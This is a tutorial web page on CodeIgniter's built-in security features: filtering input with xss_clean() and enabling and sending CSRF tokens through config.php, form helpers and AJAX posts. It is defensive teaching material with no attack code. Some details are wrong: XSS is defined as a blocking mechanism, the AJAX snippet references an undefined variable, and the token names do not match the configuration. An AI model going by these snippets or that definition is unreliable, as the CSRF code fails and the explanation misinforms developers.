Codeigniter - SPLessons

CodeIgniter Security

Home > Lesson > Chapter 29
SPLessons 5 Steps, 3 Clicks
5 Steps - 3 Clicks

CodeIgniter Security

CodeIgniter Security

shape Description

In CodeIgniter Security terms, XSS stands for Cross-site scripting is a mechanism which will block harmful Javascript code or any kind of malicious code that tries to hijack the cookies or any useful information. The method xss_clean() have to be used to pass the data from XSS filter. If the method is not used, data is encountered via cookies and get/post methods applies directly on the code which is harmful. The class "security" is used by the CodeIgniter applications that has various methods to a secure themselves. For sanitizing a particular data you have to pass that data into xss_clean(). Syntax: Initially load "security" class inside the constructor present in controller file as shown below. [php]$this->load->library("security");[/php] Follow the filtering process by using the function "xss_clean". [php]$data = $this->security->xss_clean($data);[/php]

CSRF Token

shape Description

One of the default feature of CodeIgniter Security is CSRF (Cross Site Request Forgery). In order to use it manually and make the application forms secure, config variable has to be changed which is present in application/config folder. So whenever the application sends the POST requests, CSRF token handles the code and helps in securing the forms. CSRF token is a hash string that is assigned to every request of the form and it also checks the submission value. It also checks the cookie/session before processing the request. The request is accepted only when both the values matches otherwise the request will be rejected.

Enable CSRF protection

In CodeIgniter application, CSRF protection can be enabled by changing the default value of FALSE to TRUE in the file config.php present in application/config folder as shown below. [php] $config['csrf_protection'] = TRUE; // changed FALSE to TRUE $config['csrf_token_name'] = 'csrftest_name'; $config['csrf_cookie_name'] = 'csrfcookie_name'; [/php] In the above code, name can be varied.

Methods to use CSRF Token

shape Description

There are two ways to include the CSRF token in the CodeIgniter application.

Form helper

Using CodeIgniter form helper class, CSRF tokens can be added automatically or in a custom form for which custom hidden input name and its value are to be given. Using form helper class: [php] <?php echo form_open(base_url( 'user/login' ), array( 'id' => 'login', 'class' => 'login' ));?> <input type="text" name="username" /> <input type="password" name="password" /> <input type="submit" name="submit" value="Submit" /> <?php echo form_close();?> [/php] Output: [php] <form action="http://localhost/codeigniter/index.php" method="post" accept-charset="utf-8"><div style="display:none"> <input type="hidden" name="csrf_test_name" value="0729bc908947526aa2e7951fb9066701" /> <input type="text" name="username" /> <input type="password" name="password" /> <input type="submit" name="submit" value="Submit" /> [/php] Using Custom Form: [php] <input type="hidden" name="<?php echo $this->security->get_csrf_token_name();?>" value="<?php echo $this->security->get_csrf_hash();?>"> [/php]

Use in AJAX call

Suppose, AJAX is being used in the application and token is not passed with POST data then, CodeIgniter will through a error 500 (Internal Server Error) which states that the forms in the application should use CSRF tokens and then should be pass with POST data. [html] <!-- Add CSRF Token as Variable into HEAD --> <script type="text/javascript"> var csrf_token = '<?php echo $this->security->get_csrf_hash(); ?>'; </script> <!-- Call AJAX code and used CSRF Token --> <script type="text/javascript"> $.post('POST URL', { data: 'value', 'csrf_test_name': csrf_value }, function( response ) { // response }, 'json' ); </script> [/html]

Summary

shape Key Points

  • The method xss_clean() have to be used to pass the data from XSS filter.
  • CSRF token is a hash string that is assigned to every request of the form.
  • Using CodeIgniter form helper class, CSRF tokens can be added automatically or in a custom form.